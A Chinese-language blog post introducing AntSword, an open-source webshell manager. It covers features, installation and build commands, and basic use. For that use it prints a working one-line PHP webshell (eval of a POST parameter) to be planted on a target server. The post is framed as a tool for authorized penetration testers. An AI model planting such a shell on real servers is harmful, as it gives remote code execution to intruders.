中国蚁剑AntSword:开源的跨平台WebShell管理工具
- 发表于
- 安全工具
中国蚁剑AntSword
中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。是一款非常优秀的webshell管理工具。
核心功能
- Shell代理功能
- Shell管理
- 文件管理
- 虚拟终端
- 数据库管理
- 插件市场
- 插件开发
开发版本针对有一定编程基础的开发者,你可以根据阅读文档或者分析源码了解熟悉整个应用的执行流程,然后便可随意对代码进行修改增强个性化自定义,真正打造出属于自己的一把宝剑!
中国蚁剑AntSword下载安装
蚁剑AntSword加载器安装
从 v2.0.0-beta 版本开始,引入了加载器概念。用户/开发者只需要下载对应平台的加载器,无需安装额外的环境,即可对源代码进行编辑/执行/调试等操作。可直接运行当前最新的开发版和发行版源代码。点此获取加载器
系统 | 下载 | 说明 |
---|---|---|
OSX/MAC | dmg | 中国蚁剑AntSword MAC安装 |
Linux 64位 | linux-x64.zip | 中国蚁剑AntSword Linux安装 |
Windows 64位 | windows-x64.zip | 中国蚁剑AntSword Windows安装 |
注意:蚁剑加载器仅在 https://github.com/AntSwordProject/AntSword-Loader
发布,下载后请第一时间校验 md5 值。
首次打开加载器时,界面如下图所示:
点击「初始化
」按钮,选择一个空目录作为蚁剑的工作目录,加载器会自动下载源代码。待提示初始化完毕时,重新打开蚁剑加载器,即可看到蚁剑的主界面。
蚁剑AntSword下载源码编译安装
下载蚁剑AntSword源码并安装依赖
1 2 |
$ git clone https://github.com/antoor/antSword.git $ npm install |
编译源码
1 |
$ npm run build |
启动应用
1 |
$ npm start |
中国蚁剑AntSword使用
以PHP为例蚁剑教程,在目标服务器的Web目录下新建一个Shell,名为ant.php,内容
1 |
<?php eval($_POST['ant']); ?> |
打开AntSword,在空白位置单击「鼠标右键」,弹出菜单中选择 「添加数据
」,在添加数据界面中,添加连接信息。然后点击 「添加
」按钮,即可在数据管理中看到刚才添加的 Shell,双击刚才添加的 Shell,即可看到文件管理界面,右键会更到更多功能。使用大致和菜刀类似。使用中你会发现更多中国蚁剑AntSword的使用技巧。
中国蚁剑AntSword免杀过waf
待补充
参考
原文连接:中国蚁剑AntSword:开源的跨平台WebShell管理工具
所有媒体,可在保留署名、
原文连接
的情况下转载,若非则不得使用我方内容。